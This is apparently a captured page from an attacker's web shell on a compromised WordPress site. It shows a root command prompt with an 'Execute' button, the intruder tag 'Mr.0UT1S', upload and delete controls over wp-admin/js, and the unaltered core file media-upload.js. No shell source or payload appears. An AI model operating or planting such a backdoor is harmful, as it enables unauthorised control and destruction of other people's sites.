home
/
aioutajg
/
unblockedgames247.com
/
wp-admin
/
js
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] widgets
N/A
accordion.js
2.86 KB
Rename
Delete
accordion.min.js
758 bytes
Rename
Delete
application-passwords.js
6.24 KB
Rename
Delete
application-passwords.min.js
2.95 KB
Rename
Delete
auth-app.js
5.66 KB
Rename
Delete
auth-app.min.js
2.04 KB
Rename
Delete
code-editor.js
11.32 KB
Rename
Delete
code-editor.min.js
3.01 KB
Rename
Delete
color-picker.js
9.54 KB
Rename
Delete
color-picker.min.js
3.40 KB
Rename
Delete
comment.js
2.85 KB
Rename
Delete
comment.min.js
1.28 KB
Rename
Delete
common.js
61.09 KB
Rename
Delete
common.min.js
23.07 KB
Rename
Delete
custom-background.js
3.35 KB
Rename
Delete
custom-background.min.js
1.18 KB
Rename
Delete
custom-header.js
1.98 KB
Rename
Delete
customize-controls.js
287.36 KB
Rename
Delete
customize-controls.min.js
109.14 KB
Rename
Delete
customize-nav-menus.js
110.92 KB
Rename
Delete
customize-nav-menus.min.js
46.89 KB
Rename
Delete
customize-widgets.js
70.05 KB
Rename
Delete
customize-widgets.min.js
27.41 KB
Rename
Delete
dashboard.js
27.02 KB
Rename
Delete
dashboard.min.js
8.65 KB
Rename
Delete
edit-comments.js
37.12 KB
Rename
Delete
edit-comments.min.js
15.13 KB
Rename
Delete
editor-expand.js
41.61 KB
Rename
Delete
editor-expand.min.js
13.14 KB
Rename
Delete
editor.js
43.98 KB
Rename
Delete
editor.min.js
12.76 KB
Rename
Delete
farbtastic.js
7.67 KB
Rename
Delete
gallery.js
5.41 KB
Rename
Delete
gallery.min.js
3.65 KB
Rename
Delete
image-edit.js
39.98 KB
Rename
Delete
image-edit.min.js
15.15 KB
Rename
Delete
inline-edit-post.js
20.17 KB
Rename
Delete
inline-edit-post.min.js
9.41 KB
Rename
Delete
inline-edit-tax.js
7.61 KB
Rename
Delete
inline-edit-tax.min.js
2.93 KB
Rename
Delete
iris.min.js
23.09 KB
Rename
Delete
language-chooser.js
890 bytes
Rename
Delete
language-chooser.min.js
423 bytes
Rename
Delete
link.js
3.89 KB
Rename
Delete
link.min.js
1.70 KB
Rename
Delete
media-gallery.js
1.27 KB
Rename
Delete
media-gallery.min.js
611 bytes
Rename
Delete
media-upload.js
3.38 KB
Rename
Delete
media-upload.min.js
1.13 KB
Rename
Delete
media.js
6.61 KB
Rename
Delete
media.min.js
2.38 KB
Rename
Delete
nav-menu.js
60.44 KB
Rename
Delete
nav-menu.min.js
29.77 KB
Rename
Delete
password-strength-meter.js
4.14 KB
Rename
Delete
password-strength-meter.min.js
1.10 KB
Rename
Delete
password-toggle.js
1.31 KB
Rename
Delete
password-toggle.min.js
847 bytes
Rename
Delete
plugin-install.js
6.92 KB
Rename
Delete
plugin-install.min.js
2.35 KB
Rename
Delete
post.js
38.68 KB
Rename
Delete
post.min.js
18.40 KB
Rename
Delete
postbox.js
18.49 KB
Rename
Delete
postbox.min.js
6.60 KB
Rename
Delete
privacy-tools.js
10.67 KB
Rename
Delete
privacy-tools.min.js
5.03 KB
Rename
Delete
revisions.js
33.92 KB
Rename
Delete
revisions.min.js
17.97 KB
Rename
Delete
set-post-thumbnail.js
876 bytes
Rename
Delete
set-post-thumbnail.min.js
620 bytes
Rename
Delete
site-health.js
13.15 KB
Rename
Delete
site-health.min.js
6.13 KB
Rename
Delete
site-icon.js
6.10 KB
Rename
Delete
site-icon.min.js
2.20 KB
Rename
Delete
svg-painter.js
3.20 KB
Rename
Delete
svg-painter.min.js
1.53 KB
Rename
Delete
tags-box.js
10.88 KB
Rename
Delete
tags-box.min.js
3.00 KB
Rename
Delete
tags-suggest.js
5.64 KB
Rename
Delete
tags-suggest.min.js
2.22 KB
Rename
Delete
tags.js
4.85 KB
Rename
Delete
tags.min.js
2.04 KB
Rename
Delete
theme-plugin-editor.js
24.77 KB
Rename
Delete
theme-plugin-editor.min.js
11.43 KB
Rename
Delete
theme.js
54.67 KB
Rename
Delete
theme.min.js
26.42 KB
Rename
Delete
updates.js
109.33 KB
Rename
Delete
updates.min.js
47.27 KB
Rename
Delete
user-profile.js
15.00 KB
Rename
Delete
user-profile.min.js
6.70 KB
Rename
Delete
user-suggest.js
2.25 KB
Rename
Delete
user-suggest.min.js
676 bytes
Rename
Delete
widgets.js
22.56 KB
Rename
Delete
widgets.min.js
12.31 KB
Rename
Delete
word-count.js
7.52 KB
Rename
Delete
word-count.min.js
1.49 KB
Rename
Delete
xfn.js
740 bytes
Rename
Delete
xfn.min.js
458 bytes
Rename
Delete
/** * Contains global functions for the media upload within the post edit screen. * * Updates the ThickBox anchor href and the ThickBox's own properties in order * to set the size and position on every resize event. Also adds a function to * send HTML or text to the currently active editor. * * @file * @since 2.5.0 * @output wp-admin/js/media-upload.js * * @requires jQuery */ /* global tinymce, QTags, wpActiveEditor, tb_position */ /** * Sends the HTML passed in the parameters to TinyMCE. * * @since 2.5.0 * * @global * * @param {string} html The HTML to be sent to the editor. * @return {void|boolean} Returns false when both TinyMCE and QTags instances * are unavailable. This means that the HTML was not * sent to the editor. */ window.send_to_editor = function( html ) { var editor, hasTinymce = typeof tinymce !== 'undefined', hasQuicktags = typeof QTags !== 'undefined'; // If no active editor is set, try to set it. if ( ! wpActiveEditor ) { if ( hasTinymce && tinymce.activeEditor ) { editor = tinymce.activeEditor; window.wpActiveEditor = editor.id; } else if ( ! hasQuicktags ) { return false; } } else if ( hasTinymce ) { editor = tinymce.get( wpActiveEditor ); } // If the editor is set and not hidden, // insert the HTML into the content of the editor. if ( editor && ! editor.isHidden() ) { editor.execCommand( 'mceInsertContent', false, html ); } else if ( hasQuicktags ) { // If quick tags are available, insert the HTML into its content. QTags.insertContent( html ); } else { // If neither the TinyMCE editor and the quick tags are available, // add the HTML to the current active editor. document.getElementById( wpActiveEditor ).value += html; } // If the old thickbox remove function exists, call it. if ( window.tb_remove ) { try { window.tb_remove(); } catch( e ) {} } }; (function($) { /** * Recalculates and applies the new ThickBox position based on the current * window size. * * @since 2.6.0 * * @global * * @return {Object[]} Array containing jQuery objects for all the found * ThickBox anchors. */ window.tb_position = function() { var tbWindow = $('#TB_window'), width = $(window).width(), H = $(window).height(), W = ( 833 < width ) ? 833 : width, adminbar_height = 0; if ( $('#wpadminbar').length ) { adminbar_height = parseInt( $('#wpadminbar').css('height'), 10 ); } if ( tbWindow.length ) { tbWindow.width( W - 50 ).height( H - 45 - adminbar_height ); $('#TB_iframeContent').width( W - 50 ).height( H - 75 - adminbar_height ); tbWindow.css({'margin-left': '-' + parseInt( ( ( W - 50 ) / 2 ), 10 ) + 'px'}); if ( typeof document.body.style.maxWidth !== 'undefined' ) tbWindow.css({'top': 20 + adminbar_height + 'px', 'margin-top': '0'}); } /** * Recalculates the new height and width for all links with a ThickBox class. * * @since 2.6.0 */ return $('a.thickbox').each( function() { var href = $(this).attr('href'); if ( ! href ) return; href = href.replace(/&width=[0-9]+/g, ''); href = href.replace(/&height=[0-9]+/g, ''); $(this).attr( 'href', href + '&width=' + ( W - 80 ) + '&height=' + ( H - 85 - adminbar_height ) ); }); }; // Add handler to recalculates the ThickBox position when the window is resized. $(window).on( 'resize', function(){ tb_position(); }); })(jQuery);
Save